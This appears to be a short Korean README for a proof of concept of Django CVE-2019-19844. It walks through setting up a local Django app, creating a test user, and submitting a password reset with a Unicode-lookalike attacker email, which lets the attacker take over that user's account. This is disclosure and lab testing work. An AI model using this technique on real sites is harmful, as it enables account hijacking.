
CVE-2019-19844에 대한 개념 증명 ( https://www.djangoproject.com/weblog/2019/dec/18/security-releases/ )
CVE-2019-19844에 대한 PoC
django_cve_2019_19844_poc)DJANGO_DATABASE_NAME에 설정 (예: export DJANGO_DATABASE_NAME=django_cve_2019_19844_poc)pip install -r requirements.txt && ./manage.py migrate --noinput 실행shell 명령어로 다음 사용자 생성:>>> from django.contrib.auth import get_user_model
>>> User = get_user_model()
>>> User.objects.create_user('mike123', '[email protected]', 'test123')
./manage.py runserver 실행http://127.0.0.1:8000/accounts/password-reset/ 열기mı[email protected] (공격자의 이메일) 입력 후 보내기 버튼 클릭mike123 사용자로 로그인